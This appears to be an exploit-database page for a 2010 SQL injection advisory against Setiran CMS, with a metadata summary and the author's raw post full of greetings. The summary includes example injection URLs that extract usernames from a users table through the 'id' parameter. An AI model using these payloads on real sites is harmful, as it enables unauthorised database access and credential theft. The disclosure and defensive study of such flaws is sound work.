Setiran CMS Blind SQL injection Vulnerable

vendor:

Setiran CMS

by:

Th3 RDX

7,5

CVSS

HIGH

Blind SQL injection

CWE

Product Name: Setiran CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Demo Site

2010

Setiran CMS Blind SQL injection Vulnerable

Setiran CMS is vulnerable to Blind SQL injection. An attacker can inject malicious SQL queries into the vulnerable parameter 'id' in the URL. For example, http://server/Setiran/index.asp?id=1' and 1=convert(int,(select top 1 username from users))-- and http://server/Setiran/?id=522' and 1=convert(int,(select top 1 username from users))-- can be used to inject malicious SQL queries.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Setiran CMS Blind SQL injection Vulnerable
# Date: 1-07-2010
# Author: Th3 RDX
# Software Link:
# Version: n/a
# Tested on: Demo Site
# category: webapp
# Code : n/a
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky, r0073r(inj3ct0r.com),
                          Nishi (br0wn_sug4r)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   RooT Bro waiting for u to come online desperately and missing you alot :(
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

        Th3 RDX

----- [ E - mail ] -----

    th3rdx@gmail.com


                                                        %\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Setiran CMS Blind SQL injection Vulnerable

----- [ Vendor ] -----

http://www.setiran.com/

                                                        %\\
##############################################################################

##############################################################################
%//

----- [ Injection (s) ] -----

----- [ BSQL Injection ] -----

Put [BSQLi CODE]

[Link] http://server/Setiran/index.asp?id=[BSQLi CODE]

[Link] http://server/Setiran/?id=522[BSQLi CODE]


                                                        %\\
##############################################################################

##############################################################################
%//

                                                       %\\
##############################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Thanks To All: www.Exploit-db.com | Inj3ct0r Team | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN

=> c0d3 for motherland, h4ck for motherland

==> i'm little more than useless <==
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.

Bug discovered : 1 July 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#End 0Day#